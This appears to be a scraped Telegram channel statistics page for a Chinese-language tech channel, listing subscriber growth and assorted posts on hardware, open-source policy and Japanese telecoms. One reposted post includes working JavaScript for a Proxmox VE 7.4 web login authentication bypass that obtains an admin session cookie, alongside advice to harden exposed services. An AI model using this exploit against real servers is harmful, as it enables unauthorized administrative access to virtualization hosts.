emit Light();
Ir al canal en Telegram
> Dear betrayer, have you claimed the gold you were promised? > 亲爱的背叛者,你受赐黄金了吗? 本频道中的内容仅代表发布者所扮演的黎明余光的个人观点,与频道所有者 @idawnlight 本人无关。
Mostrar más577
Suscriptores
Sin datos24 horas
-27 días
+430 días
Carga de datos en curso...
Atraer Suscriptores
septiembre '26
septiembre '260
en 0 canales
agosto '26
+11
en 8 canales
Get PRO
julio '26
+14
en 6 canales
Get PRO
junio '26
+3
en 0 canales
Get PRO
mayo '26
+117
en 3 canales
Get PRO
abril '26
+172
en 3 canales
Get PRO
marzo '26
+18
en 4 canales
Get PRO
febrero '26
+4
en 1 canales
Get PRO
enero '26
+7
en 2 canales
Get PRO
diciembre '25
+4
en 1 canales
Get PRO
noviembre '25
+7
en 3 canales
Get PRO
octubre '25
+10
en 3 canales
Get PRO
septiembre '25
+8
en 2 canales
Get PRO
agosto '25
+7
en 3 canales
Get PRO
julio '25
+13
en 3 canales
Get PRO
junio '25
+12
en 4 canales
Get PRO
mayo '25
+7
en 2 canales
Get PRO
abril '25
+1
en 1 canales
Get PRO
marzo '25
+4
en 1 canales
Get PRO
febrero '25
+17
en 7 canales
Get PRO
enero '25
+7
en 1 canales
Get PRO
diciembre '24
+3
en 0 canales
Get PRO
noviembre '24
+9
en 1 canales
Get PRO
octubre '24
+11
en 1 canales
Get PRO
septiembre '24
+3
en 0 canales
Get PRO
agosto '24
+5
en 2 canales
Get PRO
julio '24
+7
en 3 canales
Get PRO
junio '24
+6
en 1 canales
Get PRO
mayo '24
+18
en 3 canales
Get PRO
abril '24
+18
en 1 canales
Get PRO
marzo '24
+17
en 4 canales
Get PRO
febrero '24
+14
en 3 canales
Get PRO
enero '24
+211
en 1 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 01 septiembre | 0 |
Publicaciones del Canal
Repost from N/a
Update: 由于 PVE 7.x 已 EOL,因此对应版本的 Exploit 已提前发布(确认可完整绕过 WebUI 认证),8.x/9.x 则被作者声明为 “暂时不受影响”
无论如何,尽快参考 最佳实践 加固你所有对外开放的敏感服务!
Exp (.js) 正文:
// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
const form = new URLSearchParams({
username: "root@pam",
password: "root@pam",
"tfa-challenge": "NEBUSEC-CHALLENGE",
});
const loginResponse = await fetch("/api2/json/access/ticket", {
method: "POST",
credentials: "omit",
headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
body: form,
});
const loginBody = await loginResponse.json();
document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
location.reload()
})();
观后感:不是,你就这么水灵灵的拿到 login cookie 了?
https://fixupx.com/nebusecurity/status/2094719919539793989| 2 | 第一次见反过来贴的卡函( | 35 |
| 3 | 这是在串吗.webp
https://rustchinaconf.org/zh-CN/schedule | 41 |
| 4 | https://x.com/YSD0118/status/2094016849545404782
阴阳怪气这块还得看日本人 | 66 |
| 5 | 卡瓦邦噶! - Ingress 流量整形 | 78 |
| 6 | 夏日已所剩无几 - 泠鸢yousa | 79 |
| 7 | https://fixupx.com/astraorsa/status/2093759265936933337 | 103 |
| 8 | 匠心手作純C99 declarative UI layout engine,可以compile成15kb wasm在網頁上跑🤯
https://www.nicbarker.com/clay | 73 |
| 9 | IBM 推出双指令集处理器
2026-08-28 18:06 by 影子之舞
IBM 在 Hot Chips 2026 上介绍了世界首款双指令集处理器。全球约七成交易量都通过 IBM Z 大型机完成,新处理器通过引入 Arm 生态系统,为大型机带来新一代的应用。该处理器采用 2 纳米工艺节点,包括 11 个主频超过 5.7 GHz 的高性能核心、面向交易过程中欺诈检测的 AI 推理加速器、用于 I/O 加速的专用片上数据处理单元以及面向高负载企业级应用的大容量缓存架构。该芯片并未采用彼此独立的 Arm 核心和 IBM 核心。每个处理器核心均可原生执行 Arm 与 IBM Z 指令,或 Arm 与 LinuxONE 指令,同时保持平台既有的性能、安全、加密和可用性。
https://www.servethehome.com/ibm-z-and-linuxone-dual-isa-processor-and-ai-acceleration-at-hot-chips-2026/
https://china.newsroom.ibm.com/2026-08-26-IBM-IBM-Z-LinuxONE
#IBM | 76 |
| 10 | SourceHut 宣布禁止包含 LLM 生成内容的项目,包括代码/邮件/工单等。
- 此政策将于两周后的 9/10 生效;不合规的已有项目被要求迁走,但并无期限要求。
- 关于代码方面,政策只对最上游 repo 作出限制。包含 LLM 生成代码项目(例如 Linux kernel)的镜像/fork 则不在此限。
- 这个政策比 Codeberg 的 [thread] 更强:前者只限制主要由 LLM 生成的项目。
https://sourcehut.org/blog/2026-08-27-tos-changes-and-llms/
thread: /4888
#Sourcehut #Opensource #LLM | 66 |
| 11 | Sin texto... | 101 |
| 12 | https://fixupx.com/CatChen/status/2092488049280385054 | 105 |
| 13 | 但总之先 Bronze 了,后面再飞一天凑一下大概终于能白金了😇 | 96 |
| 14 | 还有高手😇 | 91 |
| 15 | https://github.com/deepseek-ai/deepseek-harness/discussions/3786
这下知道他们为什么 README 里用 pnpm 了( | 92 |
| 16 | ANA SFC 修行的倒数第二天也是体验上备降了😇 | 96 |
| 17 | https://fixupx.com/yibocho/status/2092531291971527124
KDDI 神了,povo 5G SA 版创新地引入了设备白名单,本以为官网强调的 compatible devices 只是针对 5G SA,没想到实际上是直接给不在白名单上的设备发 Illegal ME,按规范 Modem 将完全禁用该卡,因此 4G 等也会一并不可用
同时该白名单非常有限,目前已知非日版 iPhone、非 KDDI / au 自己发售的 Android 设备等都可能被禁,并非只看硬件支持😇 | 96 |
| 18 | https://www.jreast.co.jp/press/2026/20260826_ho01.pdf
Suica 确实要把企鹅去掉了 | 90 |
| 19 | 马一龙你罪大恶极 | 57 |
| 20 | https://github.com/xoreaxeaxeax/movfuscator () | 102 |
